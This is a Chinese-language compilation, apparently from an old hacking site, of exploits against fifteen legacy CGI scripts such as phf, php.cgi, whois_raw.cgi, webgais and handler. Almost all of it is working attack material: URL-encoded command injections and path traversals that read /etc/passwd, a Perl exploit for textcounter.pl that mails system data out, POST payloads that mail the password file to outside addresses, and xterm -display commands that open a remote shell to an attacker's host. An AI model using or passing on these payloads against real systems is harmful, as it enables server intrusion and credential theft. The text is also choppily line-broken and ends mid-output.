|
|
|
CGI漏洞集锦 |
一.phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:
lynx
http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
但是我们还能找到它吗?
二.php.cgi
2.0beta10或更早版本的漏洞
可以读nobody权限的所有文件.
lynx
http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi
2.1版本的只能读shtml文件了.
对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd
/etc/security/passwd等.
三.whois_raw.cgi
lynx
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
四.faxsurvey
lynx
http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
五.textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml';
# please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; #
please _DO_ _modify_ this
if ($ARGV[0]) {
$CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat
hosts;set)\|mail ${EMAIL}
-sanothere_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/
/\$\{IFS\}/g;#print "$text\n";
system({"wget"} "wget", $text,
"-O/dev/null");
system({"wget"} "wget", $text,
"-O/dev/null");
#system({"lynx"} "lynx", $text);
#如果没有wget命令也可以用lynx
#system({"lynx"} "lynx",
$text);
六.一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET
./info2www '(../../../../../../../bin/mail jami
</etc/passwd|)'
$
You have new
mail.
$
说实在我不太明白.:(
七.pfdispaly.cgi
lynx -source
\
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi还有另外一个漏洞可以执行命令
lynx
-dump
http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
or
lynx
-dump
\
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
八.wrap
lynx
http://www.victim.com/cgi-bin/wrap?/../../../../../etc
九.www-sql
可以让你读一些受限制的页面如:
在你的浏览器里输入:http://your.server/protected/something.html:
被要求输入帐号和口令.而有www-sql就不必了:
http://your.server/cgi-bin/www-sql/protected/something.html:
十.view-source
lynx
http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd
十一.campas
lynx
http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
十二.webgais
telnet
www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85
(replace this with the actual length of the
"exploit"line)
query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
十三.websendmail
telnet
www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length:
xxx (should be replaced with the actual length of the
string passed to
the server, in this case
xxx=90)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
十四.handler
telnet
www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat
/etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh
-display yourhost.com|?data=Download
or
GET
/cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>/bin/sh|<tab>?data=Download
注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.
十五.test-cgi
lynx
http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test
script report:
argc is 0. argv is .
SERVER_SOFTWARE =
NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE =
CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT =
80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain,
application/x-html, application/html,
text/html,
text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME =
/cgi-bin/ |
|